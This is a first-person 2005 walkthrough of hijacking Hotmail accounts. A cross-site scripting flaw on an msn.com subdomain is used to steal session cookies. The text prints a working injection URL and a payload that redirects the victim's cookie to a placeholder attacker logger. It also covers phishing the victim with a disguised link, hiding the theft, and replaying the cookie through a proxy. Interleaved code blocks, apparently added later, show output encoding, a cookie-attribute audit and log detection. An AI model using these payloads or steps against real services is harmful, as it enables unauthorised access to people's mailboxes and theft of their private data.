What is this document about
In this document I explain how to exploit a security hole I found in
http://www.hotmail.com/. This is not fiction but a real story, and it
still works as of today (2005-06-04). With this exploit you can access
other people's mailboxes, view their contacts and much more. All that
needs to be done is to send the user an e-mail with a link to an
internet page you created. When the user clicks on this link, his inbox
is all yours.
I've tried to explain the situation as simply as possible, so that
anyone can understand it.
How does it work
One of the following things is needed to log in to Hotmail:
1. When you know his/her e-mail address and password, you can log in
with that username and password on http://www.hotmail.com/
2. When you know his/her account information, like country and zip
code, and you are able to answer his/her secret question. In this case
you can reset his/her password and log in just like option 1, with the
new password.
3. When you have access to his/her alternate e-mail address, you can
send a password reset e-mail message to that account to reset his/her
password.
4. When you have his/her 'cookie' for passport.net or hotmail.msn.com,
you can 'fake' his/her cookie and make Hotmail believe you are already
logged in as this user.
I am using option 4 to make my exploit work. This exploit uses the
cookie from hotmail.msn.com to access the victim's inbox. Because the
cookie is not limited to the domain hotmail.msn.com, I can also use an
exploit on the site msn.com to steal the cookie from the victim. When I
searched msn.com for an exploit called "HTML Injection" or "Cross Site
Scripting" (XSS), it took me about 30 minutes to find one. With this
exploit type I'm able to insert additional pieces of HTML or JavaScript
into a page of msn.com. When I insert the code
<SCRIPT>alert(document.cookie)</SCRIPT>
the user will see a message box just like the picture below when he
visits that site.
The real HTML injection example with popup can be viewed at:
http://ilovemessenger.msn.com/?mkt=nl-nl');alert(document.cookie);escape('
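The bug behind the injected URL above is a query parameter pasted straight into a JavaScript string literal inside a script block. The following is an added example, not msn.com's real code, that reproduces that pattern next to the fix (a JSON-encoded literal with `<`, `>` and the line terminators hex-escaped); the page's own payload is used as input, and `statementCount` is a crude review helper that counts the statements outside string literals.

```javascript
// Added example (not msn.com's real code): a query parameter reflected
// into an inline <script> string literal, and a safe way to encode it.
const payload = "nl-nl');alert(document.cookie);escape('"; // from the page

// VULNERABLE: raw concatenation into a JS string literal. The payload's
// first "')" closes escape('...'), so the rest runs as code.
function renderUnsafe(mkt) {
  return "<script>var market = escape('" + mkt + "');</script>";
}

// SAFE: JSON.stringify yields a valid JS string literal (quotes and
// backslashes escaped); '<', '>' and U+2028/U+2029 are then hex-escaped
// so the value can neither close the <script> element nor break the
// literal.
function jsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(/[<>\u2028\u2029]/g,
    (c) => "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0"));
}
function renderSafe(mkt) {
  return "<script>var market = escape(" + jsStringLiteral(mkt) + ");</script>";
}

// Review helper: count ';'-separated statements in the script body after
// blanking out string literals. The unsafe render turns the payload into
// extra top-level statements; the safe render keeps exactly one.
function statementCount(html) {
  const body = html.replace(/^<script>|<\/script>$/g, "");
  const noStrings = body.replace(/"(?:\\.|[^"\\])*"|'(?:\\.|[^'\\])*'/g, '""');
  return noStrings.split(";").filter((s) => s.trim().length > 0).length;
}
```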
With the text you can see in the "alert message box" above, everybody
with some knowledge is able to access my inbox. This text is sent by my
browser to Hotmail every time I visit a site with the domain "msn.com".
This is how Hotmail knows I am still logged in. The text in the popup is
called a "cookie". A trick used by attackers is to fake somebody else's
cookie. I will explain one easy method, although there are different
ways of doing it. I can fake cookies with a helper program called
"Proxomitron". Proxomitron acts like a proxy server with the option to
change, fake or block HTTP headers. Cookie text, like the text in the
popup, is sent invisibly by the browser in an HTTP header called
"Cookie". Because Proxomitron is able to fake headers, this program is
very useful to me.
I will explain later how Proxomitron must be configured to fake cookies.
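The write-up depends on two properties of the cookie: it is scoped to the parent domain, so every msn.com host receives it, and it is readable from script via document.cookie. The following added example (not Hotmail's or Passport's code; the cookie name and values are constructed) audits a Set-Cookie header for exactly those properties, the check a defender would run on the fix.

```javascript
// Added example (not Hotmail's or Passport's code): audit a Set-Cookie
// header for the properties this cookie theft relies on. A cookie scoped
// to the parent domain (Domain=.msn.com) is sent to every msn.com host,
// so an XSS on any of them reaches it; a cookie without HttpOnly is
// readable via document.cookie. Header values below are constructed.
function parseSetCookie(header) {
  const [nameValue, ...attrs] = header.split(";").map((s) => s.trim());
  const eq = nameValue.indexOf("=");
  const cookie = { name: nameValue.slice(0, eq), value: nameValue.slice(eq + 1), attrs: {} };
  for (const a of attrs) {
    const i = a.indexOf("=");
    const key = (i < 0 ? a : a.slice(0, i)).toLowerCase();
    // a leading dot on Domain is ignored by browsers; normalise it away
    cookie.attrs[key] = i < 0 ? true : a.slice(i + 1).replace(/^\./, "").toLowerCase();
  }
  return cookie;
}

// Returns a list of findings; an empty list means the cookie is scoped
// to the issuing host, hidden from script, and sent only over TLS.
function auditSetCookie(header, issuingHost) {
  const c = parseSetCookie(header);
  const findings = [];
  const domain = c.attrs.domain;
  if (domain && domain !== issuingHost.toLowerCase()) {
    findings.push("Domain=" + domain + " is broader than " + issuingHost +
      ": any XSS on *." + domain + " can read it");
  }
  if (!c.attrs.httponly) findings.push("missing HttpOnly: exposed via document.cookie");
  if (!c.attrs.secure) findings.push("missing Secure: sent over plain HTTP");
  return findings;
}

// Constructed headers: the weak shape described in this write-up, and a
// hardened one scoped to the issuing host.
const weak = "session=EXAMPLE_VALUE; Domain=.msn.com; Path=/";
const fixed = "session=EXAMPLE_VALUE; Domain=hotmail.msn.com; Path=/; Secure; HttpOnly";
```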
How does the attacker get the cookie? Showing a popup to the user with
his cookie information does not help the attacker. The attacker wants
the text that is now shown in the popup box. To log cookies the hacker
needs to create an internet page with PHP or ASP, which writes some text
to a log file on a web server. I've created a simple PHP script that is
able to log text to a log file. I've named this file "cookielogger.php"
and its content looks like this:
I uploaded this file to a web server. As an example I'll use the fake
internet site http://www.hacker.com/. To test the PHP script I'll go to
http://www.hacker.com/cookielogger.php?cookie=test
I can see the text "Successfully wrote a string to the log file". When I
now browse to http://www.hacker.com/logfile.txt I can see the text
"test".
When I go to
http://www.hacker.com/cookielogger.php?cookie=this text is being logged
the text "this text is being logged" will be appended to the log file
http://www.hacker.com/logfile.txt
Cookielogger.php is now ready to log text strings, so it's also ready to
log cookies. I use the Cross Site Scripting exploit to inject code that
will redirect the user to http://www.hacker.com/cookielogger.php with
the argument "cookie" filled with the user's cookie. So when the user
visits the msn site with the added code, he will be redirected to
http://www.hacker.com/cookielogger.php?cookie=hiscookie and the hacker
can read his cookie information at the site
http://www.hacker.com/logfile.txt, because "hiscookie" is now logged to
a text file the hacker can see. The code I'm inserting in msn.com will
look like this:
<SCRIPT>location.href='http://www.hacker.com/cookielogger.php?cookie='+escape(document.cookie)</SCRIPT>
See the two printscreens below of the results with the cookielogger.
Remember that "www.hacker.com" is not really used; it's just an example.
The real HTML injection example to log the cookie is:
http://ilovemessenger.msn.com/?mkt=nl-nl');location.href='http://www.hacker.com/cookielogger.php?cookie='+escape(document.cookie);escape('
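On the defender's side, the injected URL above leaves a recognisable trace in the web server's access log. The following added example (not from the page; the log lines are constructed samples in common log format using the page's placeholder hostnames) flags requests whose query string both closes a JavaScript string literal and references document.cookie or a location.href redirect, which is the shape of both payloads in this write-up.

```javascript
// Added example, not from the page: flag access-log requests carrying the
// pattern used in this write-up, a quote that closes a JS string literal
// followed by document.cookie or a location.href redirect. Log lines are
// constructed samples; hostnames are the page's placeholders.
const SAMPLE_LOG = [
  '10.0.0.1 - - [04/Jun/2005:10:00:00 +0200] "GET /?mkt=nl-nl HTTP/1.1" 200 512',
  '10.0.0.2 - - [04/Jun/2005:10:01:00 +0200] "GET /?mkt=nl-nl%27);alert(document.cookie);escape(%27 HTTP/1.1" 200 512',
  '10.0.0.3 - - [04/Jun/2005:10:02:00 +0200] "GET /?mkt=nl-nl%27);location.href=%27http://www.hacker.com/cookielogger.php?cookie=%27+escape(document.cookie);escape(%27 HTTP/1.1" 200 512',
  '10.0.0.4 - - [04/Jun/2005:10:03:00 +0200] "GET /help/cookie-policy?lang=nl HTTP/1.1" 200 512',
];

// Decode percent-encoding (and '+' as space) so encoded quotes are seen;
// fall back to the raw string on malformed input rather than throwing.
function safeDecode(s) {
  try { return decodeURIComponent(s.replace(/\+/g, " ")); } catch (e) { return s; }
}

// Extract and decode the query string from a common-log-format request line.
function queryOf(line) {
  const m = line.match(/"[A-Z]+ [^ ?]*\?([^ "]*) HTTP/);
  return m ? safeDecode(m[1]) : "";
}

const BREAKOUT = /['"]\s*\)/;                    // closes escape('...')
const EXFIL = /document\.cookie|location\.href\s*=/i;

// Returns one hit per suspicious request with the client IP and the
// decoded query, so an analyst can see the reflected payload directly.
function flagCookieTheft(lines) {
  const hits = [];
  for (const line of lines) {
    const q = queryOf(line);
    if (BREAKOUT.test(q) && EXFIL.test(q)) {
      hits.push({ ip: line.split(" ")[0], query: q });
    }
  }
  return hits;
}
```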
Okay, the exploit is ready to go. We could send the link above to the
victim in the hope he clicks the link. But there aren't many people who
go to a site like "ilovemessenger.msn.com". Also, when the user sees
something like "document.cookie" in the URL he'll probably think twice
before clicking it.
So we create a new PHP page called "redirect.php" with the following
content:
We place this file online at http://www.hacker.com/redirect.php. Now
when we send the victim an e-mail with this link and he clicks on it,
he will be redirected to the ilovemessenger site plus exploit, and from
there he will be redirected to hacker.com/cookielogger.php with his
cookie for msn.com being logged in the log file.
When these actions are completed you are ready to start exploiting the
victim. If anyone really tried to break into somebody's Hotmail account
he would also change cookielogger.php to redirect onward, or to show an
innocent message, so that the user wouldn't notice that his cookie was
logged.
When a malicious hacker sends an e-mail containing the link to the
redirect script and the victim opens his new e-mail message, he will see
something like this:
When the victim clicks the text "click this link" the exploit is set in
motion. In real life there are tons of methods of persuading the victim
to click on a link. The hacker patiently waits for a new entry in the
file http://www.hacker.com/logfile.txt. When the user finally clicks
the link and the hacker notices extra text in the log file, the fun can
start. When the victim has fallen for your trick, the log file looks
like this:
Now that the hacker has stolen the cookie of the victim, the hacker can
proceed to fake his cookie when entering Hotmail. Somewhere at the start
of this explanation I talked about "Proxomitron" to fake cookies. I will
now explain how to configure it to fake this cookie.
Proxomitron looks like this:
Just place a 'v' before "Outgoing Header Filters", because that's what
we want to do: we want to send the user's cookie to the web server as if
it were our own cookie. Press the button "Headers" to create a new
header to fake the cookie.
In the new window, fill in these values:
HTTP Header: "Cookie: a description"
URL Match: ""
Header Value Match: "*"
Replacement text: the user's cookie
Apply the new header by putting a 'v' before the new header in the "Out"
column and press Apply to save the changes.
Proxomitron is now ready for faking the cookie. Next, set up your
browser. You need to set your browser to use a proxy server; how to make
that setting differs per browser.
In Internet Explorer: "Tools -> Internet Options... -> Connections ->
LAN Settings -> Proxy server"
In Mozilla Firefox: "Tools -> General -> Connection Settings -> Manual
proxy configuration"
Set the address to "127.0.0.1" (your own PC) and the port to "8080" (the
port of the Proxomitron proxy server).
When your browser is set up to use your own proxy server, you can go to
the following URL:
http://by103fd.bay103.hotmail.msn.com/cgi-bin/hmhome?fti=yes
When successful you can now see the inbox of the victim's mailbox.